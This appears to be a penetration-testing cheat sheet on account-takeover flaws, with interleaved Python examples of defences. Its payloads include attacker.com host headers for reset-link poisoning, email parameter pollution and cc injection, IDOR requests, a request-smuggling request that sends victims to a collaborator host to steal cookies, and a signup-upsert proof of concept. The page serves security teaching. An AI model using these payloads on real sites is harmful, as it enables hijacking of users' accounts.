Registration and Account Takeover Vulnerabilities
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Registration Takeover
Duplicate Registration
- Try to register using an existing username
- Check variations of the email:
  - uppercase letters
  - +1@
  - add some dots in the email
  - special characters in the email name (%00, %09, %20)
  - put whitespace after the email: test@test.com a
  - victim@gmail.com@attacker.com
  - victim@attacker.com@gmail.com
Username Enumeration
Check whether you can determine when a username has already been registered in the application.
Password Policy
When creating a user, check the password policy (check whether weak passwords are accepted).
In that case you may try to bruteforce credentials.
SQL Injection
Check this page to learn how to attempt account takeovers or extract information via SQL Injections in registration forms.
Oauth Takeovers
SAML Vulnerabilities
Change Email
Once registered, try to change the email and check whether this change is correctly validated or whether it can be changed to an arbitrary address.
More Checks
- Check whether you can use disposable emails
- Long passwords (>200) lead to DoS
- Check the rate limits on account creation
- Use username@burp_collab.net and analyse the callback
Password Reset Takeover
Password Reset Token Leak Via Referrer
- Request a password reset for your own email address
- Click the password reset link
- Do not change the password
- Click any 3rd-party website link (e.g. Facebook, twitter)
- Intercept the request in the Burp Suite proxy
- Check whether the referer header is leaking the password reset token.
Password Reset Poisoning
- Intercept the password reset request in Burp Suite
- Add or edit the following headers in Burp Suite:
```
Host: attacker.com
X-Forwarded-Host: attacker.com
```
- Forward the request with the modified header
```http
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com
```
- Look for a password reset URL built from the host header, like:
```
https://attacker.com/reset-password.php?token=TOKEN
```
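The root cause of both the referrer leak and the poisoning above is how the reset link is built and served. The following is an added example (not code from the page or from any product it discusses) contrasting a link builder that trusts Host/X-Forwarded-Host with one that uses a server-side configured origin; CANONICAL_ORIGIN and the header dicts are assumed stand-ins for real deployment config and request objects.

```python
from urllib.parse import urlencode

# Assumed deployment setting: the only origin reset links may ever point to.
CANONICAL_ORIGIN = "https://example.com"


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Mirrors the poisoning pattern: the link host comes from attacker-
    influenced request headers, so a spoofed header redirects the token."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"https://{host}/reset-password.php?{urlencode({'token': token})}"


def safe_reset_link(headers: dict, token: str) -> str:
    """Ignores the request headers entirely and uses the configured origin."""
    return f"{CANONICAL_ORIGIN}/reset-password.php?{urlencode({'token': token})}"


def reset_page_headers() -> dict:
    """Response headers for the page whose URL carries the token.
    Referrer-Policy: no-referrer stops the token reaching third-party sites
    linked from that page (the Referer leak above); no-store keeps it out of
    shared caches."""
    return {
        "Referrer-Policy": "no-referrer",
        "Cache-Control": "no-store",
    }


if __name__ == "__main__":
    # Constructed headers imitating the poisoned request shown above.
    poisoned = {"Host": "attacker.com", "X-Forwarded-Host": "attacker.com"}
    print(vulnerable_reset_link(poisoned, "TOKEN"))  # attacker-controlled host
    print(safe_reset_link(poisoned, "TOKEN"))        # always the canonical origin
```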
Password Reset Via Email Parameter
```
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
IDOR on API Parameters
- The attacker has to log in with their own account and go to the Change password feature.
- Start Burp Suite and intercept the request
- Send it to the Repeater tab and edit the parameters: User ID/email
```
POST /api/changepass
[...]
("form": {"email":"victim@email.com","password":"securepwd"})
```
Weak Password Reset Token
The password reset token should be randomly generated and unique every time.
Try to determine whether the token expires or whether it is always the same; in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm:
- Timestamp
- UserID
- Email of the user
- Firstname and Lastname
- Date of birth
- Cryptography
- Number only
- Small token sequence (characters between [A-Z,a-z,0-9])
- Token reuse
- Token expiration date
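For contrast with the weak patterns listed above, here is an added example (not from the page) of a reset-token store that satisfies the requirements stated: random, unique, expiring and single-use. The in-memory dict, the 15-minute TTL and the function names are assumptions; the token is returned only so the caller can email it and must never be echoed in the HTTP response.

```python
import hashlib
import secrets
import time
from typing import Dict, Optional

# Assumed TTL; short enough that a leaked link goes stale quickly.
TOKEN_TTL_SECONDS = 15 * 60
# Demo storage: sha256(token) -> {"user_id", "expires", "used"}. Only the hash
# is kept, so a database leak does not hand out usable tokens.
_store: Dict[str, dict] = {}


def _hash(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(user_id: int, now: Optional[float] = None) -> str:
    """Create a token bound to user_id. It is derived from the OS CSPRNG, not
    from any user attribute (timestamp, id, email, birth date), so it cannot
    be predicted or reconstructed from public data."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits of entropy
    _store[_hash(token)] = {
        "user_id": user_id,
        "expires": now + TOKEN_TTL_SECONDS,
        "used": False,
    }
    return token


def consume_reset_token(token: str, now: Optional[float] = None) -> Optional[int]:
    """Return the user_id if the token is known, unexpired and unused,
    otherwise None. The record is marked used so a replay of the same
    link fails, and expired records are never honoured."""
    now = time.time() if now is None else now
    rec = _store.get(_hash(token))
    if rec is None or rec["used"] or now > rec["expires"]:
        return None
    rec["used"] = True
    return rec["user_id"]
```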
Leaking Password Reset Token
- Trigger a password reset request via the API/UI for a specific email, e.g. test@mail.com
- Inspect the server response and look for resetToken
- Then use the token in a URL like
```
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
```
Password Reset Via Username Collision
- Register on the system with a username identical to the victim's, but with white spaces inserted before and/or after the username, e.g.:
```
"admin "
```
- Request a password reset with your malicious username.
- Use the token sent to your email and reset the victim's password.
- Log in to the victim's account with the new password.
The CTFd platform was vulnerable to this attack.
See: CVE-2020-7245
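The duplicate-registration variants, the email-parameter tricks and the username collision above all succeed because the identity field is compared without being canonicalised first. This added example (not from the page or from CTFd) shows one strict normaliser that rejects list/duplicated parameters, control characters, separators and multiple '@', folds case and whitespace on usernames, and then checks for conflicts; the regex, function names and the `existing` dict shape are assumptions, and provider-specific aliasing (+tags, dot-insensitivity) is deliberately not folded here.

```python
import re
import unicodedata
from typing import List, Optional, Union

# Assumed: a conservative address shape; anything outside it is refused.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def canonical_email(value: Union[str, List[str], None]) -> Optional[str]:
    """Return a lowercase canonical address, or None if the input is unsafe:
    a JSON array / repeated parameter, any control character or whitespace
    (covers %00 %09 %0A %0D %20), cc/bcc injection, separators or a second '@'."""
    if not isinstance(value, str):
        return None
    if any(ord(c) < 0x21 or c in ",;|" for c in value):
        return None
    if value.count("@") != 1 or not _EMAIL_RE.fullmatch(value):
        return None
    return value.lower()


def canonical_username(value: str) -> Optional[str]:
    """Collapse the variants that collide with an existing name: outer
    whitespace, case and Unicode look-alike forms (NFKC). Inner whitespace
    is refused outright rather than silently removed."""
    norm = unicodedata.normalize("NFKC", value).strip().casefold()
    if not norm or re.search(r"\s", norm):
        return None
    return norm


def registration_conflicts(email: str, username: str, existing: dict) -> bool:
    """existing maps canonical email -> canonical username of registered users.
    Unsafe input counts as a conflict so the caller refuses it."""
    e, u = canonical_email(email), canonical_username(username)
    if e is None or u is None:
        return True
    return e in existing or u in existing.values()
```

Because the same canonical form is used at registration and at reset time, the reset mail for "admin " can only ever go to the address stored for "admin".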
Account Takeover Via Cross Site Scripting
- Find an XSS inside the application or in a subdomain if the cookies are scoped to the parent domain:
```
*.domain.com
```
- Leak the current session cookie
- Authenticate as the user using the cookie
Account Takeover Via HTTP Request Smuggling
1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
```bash
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
```
2. Craft a request that will overwrite the POST / HTTP/1.1 with the following data:
```
GET http://something.burpcollaborator.net HTTP/1.1
X:
```
with the goal of open-redirecting the victims to burpcollab and stealing their cookies
3. The final request could look like the following
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83

0

GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone reports exploiting this bug
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
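The request in step 3 works only because front-end and back-end disagree on which header frames the body. As an added example (not from the page or from smuggler), the check below is what a front-end proxy or WAF rule can apply to flag that ambiguity before forwarding: it parses the raw header block and reports CL+TE coexistence, conflicting or non-numeric Content-Length values and non-standard Transfer-Encoding tokens. The sample bytes are the step-3 request reconstructed with CRLF line endings; the function name is an assumption.

```python
from typing import List, Tuple


def framing_issues(raw: bytes) -> List[str]:
    """Return the reasons a request's body framing is ambiguous (RFC 9112
    requires a server to treat Content-Length together with Transfer-Encoding
    as an error), or [] when the framing is unambiguous."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers: List[Tuple[str, str]] = []
    for line in head.split("\r\n")[1:]:      # skip the request line
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))

    cls = [v for n, v in headers if n == "content-length"]
    tes = [v for n, v in headers if n == "transfer-encoding"]
    issues: List[str] = []
    if cls and tes:
        issues.append("both Content-Length and Transfer-Encoding present")
    if len(set(cls)) > 1:
        issues.append("conflicting Content-Length values")
    if any(not v.isdigit() for v in cls):
        issues.append("non-numeric Content-Length")
    for v in tes:
        if v.lower() != "chunked":           # e.g. 'xchunked' or 'chunked, identity'
            issues.append(f"unexpected Transfer-Encoding value {v!r}")
    return issues


# Constructed sample: the step-3 request above, CL.TE style, as raw bytes.
SMUGGLED = (
    b"GET / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nHost: something.com\r\n"
    b"User-Agent: Smuggler/v1.0\r\nContent-Length: 83\r\n\r\n0\r\n\r\n"
    b"GET http://something.burpcollaborator.net HTTP/1.1\r\nX: X\r\n"
)

if __name__ == "__main__":
    for issue in framing_issues(SMUGGLED):
        print("reject:", issue)
```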
Account Takeover via CSRF
- Create a payload for the CSRF, e.g. "HTML form with auto submit for a password change"
- Send the payload
Account Takeover via JWT
JSON Web Tokens might be used to authenticate a user.
- Edit the JWT with another User ID / Email
- Check for a weak JWT signature
JWT Vulnerabilities (Json Web Tokens)
Registration-as-Reset (Upsert on Existing Email)
Some signup handlers perform an upsert when the supplied email already exists. If the endpoint accepts a minimal body with email and password and does not enforce ownership verification, submitting the victim's email overwrites their password before any verification takes place.
- Discovery: extract endpoint names from bundled JS (or mobile app traffic), then fuzz base paths like /parents/application/v4/admin/FUZZ using ffuf/dirsearch.
- Method hints: a GET that returns a message like "Only POST request is allowed." often reveals the correct verb and that a JSON body is expected.
- Minimal body observed in the wild:
```json
{"email":"victim@example.com","password":"New@12345"}
```
PoC example:
```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}
```
Impact: Full Account Takeover (ATO) without reset token, OTP, or email verification.
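To make the bug class concrete, this added example (not the affected application's code) puts an upsert-style signup handler next to one that never modifies an existing record from the signup path and answers identically whether or not the address is taken, so the endpoint also stops serving as an enumeration oracle. The in-memory users dict, PBKDF2 parameters and the mail hook comment are assumptions.

```python
import hashlib
import secrets
from typing import Dict, Optional


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256; stored as 'salthex$digesthex'."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def password_matches(record: dict, password: str) -> bool:
    salt_hex, _ = record["password"].split("$")
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return secrets.compare_digest(record["password"], candidate)


def vulnerable_register(users: Dict[str, dict], body: dict) -> dict:
    """Upsert: an existing email silently receives the supplied password,
    which is exactly the registration-as-reset ATO described above.
    Kept only to contrast with safe_register."""
    users[body["email"]] = {"password": hash_password(body["password"]), "verified": False}
    return {"status": "ok"}


def safe_register(users: Dict[str, dict], body: dict) -> dict:
    """Create-only: an existing record is never touched from this path, and
    the response does not reveal whether the email was already registered.
    Ownership is proven by the verification mail, not by the request."""
    email = body.get("email", "").strip().lower()
    password = body.get("password", "")
    if email and password and email not in users:
        users[email] = {"password": hash_password(password), "verified": False}
    # Assumed mail hook (not shown): send the verification link to a new
    # address, or a "someone tried to register your address" notice to an
    # existing owner. Either way the caller gets the same answer.
    return {"status": "check your email"}
```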
References
- How I Found a Critical Password Reset Bug (Registration upsert ATO)
- https://salmonsec.com/cheatsheet/account_takeover